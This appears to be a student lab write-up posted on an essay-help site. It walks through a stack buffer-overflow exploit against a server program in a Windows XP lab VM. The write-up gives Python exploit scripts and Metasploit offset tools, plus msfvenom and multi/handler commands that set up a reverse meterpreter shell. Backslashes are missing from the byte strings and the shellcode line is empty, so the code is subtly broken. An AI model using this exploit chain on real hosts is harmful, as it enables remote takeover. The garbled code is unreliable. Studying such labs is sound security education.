For the preparation of the workshop two virtual machine is setup in VmWare i.e. Kali Linux and Windows XP and for both the machines the network configuration is set to NAT. The configuration NAT enables the private IP to be connected with the internet and enable communication. The IP address are checked for enabling communication between the machines and on the windows machine the immunity debugger is opened for running the python script and loading the server.exe and executed.
Then in the next step the kali linux is used for creating a file using the vi editor and is named as attack.py. The code given in the workshop is inserted in the file that is given below:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# Testing
buffer = "x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “python attack.py 192.168.0.57 1337” is executed for proceeding with the attack. The IP address used is the IP address of the windows host. In the windows machine the keys shift + F9 is pressed for passing the exception and execution of the code. A sample result is found that is given in the following screenshot where the EIP values changes to the value used by the attacker and it is also similar for the EBP value.
The ESP is used for pointing to a certain region of memory and it contains the value that is injected by the attacker.
For weaponizing the vulnerability the immunity debugger is used and the server .exe is restarted and the execution is started. In the command line interface of the kali linux machine the following command “cd /usr/share/metasploit-framework/tools/exploit”is used for entering into the metasploit framework. The command “./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337” is executed within Kali linux for getting the access of the windows host machine. On the other hand ialeun the windows the shift + F9 is pressed for adding the exception and the result is viewed for the identification of the EIP value. For the determination of the offset value of the EIP the command “./pattern_offset.rb -l 5000 -q 37694136” is used and the returned result is noted. For the given case it is 260 and depending on this the address for the code is determined that jumps to the ESP. The ESP is used for the representation of the pointer for a memory for the management of the control. The server.exe is restarted by pressing the CTRL + F2 and F9 is pressed after starting the immunity debugger. For viewing the executable modules ALT+ E is pressed in the windows virtual machine. A searching is done for the JMP ESP and if the result contains GDI 32 the memory address is noted. The attack code in the kali linux machine is modified according to the workshop and the commands is:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "x41"*260
# Overwrite EIP with JMP ESP
buffer += "x78x16xF3x77"
# NOPSLED
buffer += "x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f python” is used and exploitation is performed. For the exploitation the code msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit" is used and on the windows client the immunity debugger is closed. The modified python code is executed wit the IP address of the client for the completion of the workshop.
Cyber Security - CII ICT East 2017 | Ethical Hacking India | Ethical Hacking Institutes In India | Ethical Hacking Courses | Ethical Hacking Course In Kolkata - ISOEH. (2018). Isoeh.com. Retrieved 21 September 2018, from https://www.isoeh.com/CII-ICT-East-2017-cyber-security.html
Definitions, E., & Hope, C. (2018). What is Ethical Hacking and an Ethical Hacker?. Computerhope.com. Retrieved 21 September 2018, from https://www.computerhope.com/jargon/e/ethihack.htm
Ethical Hacking - Computing and Software Wiki. (2018). Wiki.cas.mcmaster.ca. Retrieved 21 September 2018, from https://wiki.cas.mcmaster.ca/index.php/Ethical_Hacking
Ethical Hacking - ICT Issue. (2018). Sikandar's E-Portfolio. Retrieved 21 September 2018, from https://sikandarbttportfolio.weebly.com/ethical-hacking---ict-issue.html
Freeman, R. (2016). Ethical hacking: what is it, and why would I need it?. IT Governance Blog. Retrieved 21 September 2018, from https://www.itgovernance.co.uk/blog/ethical-hacking-what-is-it-and-why-would-i-need-it/
What is ethical hacker? - Definition from WhatIs.com. (2018). SearchSecurity. Retrieved 21 September 2018, from https://searchsecurity.techtarget.com/definition/ethical-hacker
To export a reference to this article please select a referencing stye below:
My Assignment Help. (2021). Ethical Hacking And Defence. Retrieved from https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/python-code.html.
"Ethical Hacking And Defence." My Assignment Help, 2021, https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/python-code.html.
My Assignment Help (2021) Ethical Hacking And Defence [Online]. Available from: https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/python-code.html
[Accessed 13 April 2021].
My Assignment Help. 'Ethical Hacking And Defence' (My Assignment Help, 2021) <https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/python-code.html> accessed 13 April 2021.
My Assignment Help. Ethical Hacking And Defence [Internet]. My Assignment Help. 2021 [cited 13 April 2021]. Available from: https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/python-code.html.
At MyAssignmenthelp.com, we are committed to deliver quality assignment assistance in the fastest way possible. To make our service delivery fast, we have hired subject matter experts to work on different subject specific assignments. We have hired experts who owe in-depth knowledge in their respective subjects. As per their expertise, they provide geography assignment help, Physics assignment help, Strategic assignment help, history assignment help, art architecture assignment help and assistance with other subjects as well.
Answer: Introduction In this case study, the main reason for researching and doing this report understands the way New Zealand operates and where it is based on i.e. such as understanding the facts in the industry and looking at its complexity in the environment of business during its major operations especially when we compare it with its competitors. Another area understands the competitive challenges confronting the organization and how it...
Read MoreAnswer Grocery Delivery Business Analysis Introduction The scope of small businesses in the United States has been flourishing over the last few years and this trend has been very beneficial for small business owners like in this case, grocery delivery service. The company taken into consideration is ABC Pvt. Ltd. delivers grocery from super markets to the final consumers. They have tie ups with different super markets so any online delive...
Read MoreAnswer: Problem Statement Although, Unilever is a large brand with its diverse category of products but its core product Dove faced a series of controversy due to its campaign “Real Beauty” which features fat women wearing under wear. This campaign led to media controversy as the media claims that Real Beauty Campaign does not assure its customers a promising level of beauty or attractiveness. World media raise questions abo...
Read MoreAnswer: Financial Leverage Ratio Analysis: Figure 1: Indicating the Leverage Ratio (Source: As created by the author) The leverage financial ratios calculation in the above graph represents the increasing debt accumulation, which is been conducted by the company over the period of three fiscal years. The increment in debt ratio from 22.16% in 2015 to 26.13% in 2017 relevantly indicates that the company has increased their debt accumulation ...
Read MoreAnswer: Gantt chart of Primary Planning: Figure 1: Expected timeline of the project planning (Source: Created by Author) The above Gantt chart demonstrates the list of the activities necessary for the project planning and assuring that the planning being managed will be efficient and capable of managing the entire project activities. Construction projects are always sensitive projects and due to lack in proper planning it might influence ...
Read MoreJust share requirement and get customized Solution.
Orders
Overall Rating
Experts
Our writers make sure that all orders are submitted, prior to the deadline.
Using reliable plagiarism detection software, Turnitin.com.We only provide customized 100 percent original papers.
Feel free to contact our assignment writing services any time via phone, email or live chat. If you are unable to calculate word count online, ask our customer executives.
Our writers can provide you professional writing assistance on any subject at any level.
Our best price guarantee ensures that the features we offer cannot be matched by any of the competitors.
Get all your documents checked for plagiarism or duplicacy with us.
Get different kinds of essays typed in minutes with clicks.
Calculate your semester grades and cumulative GPa with our GPA Calculator.
Balance any chemical equation in minutes just by entering the formula.
Calculate the number of words and number of pages of all your academic documents.
Our Mission Client Satisfaction
awesome job. hit the very good points. best of yet! love the work thanks so much for you service! i really like the work thanks
Australia
it was great work and in short period of time ,references were good as well. Great:)
Australia
please see comments given by tutor 1 You have not formulated an aim for this presentation and, therefore, not related it to the LOs 2 You have not identified a context to apply the theories, so you are not meeting the LOs. Although your title sta...
Australia
Thank you for your help. Really appreciated my professor really liked it. I got good grades
Australia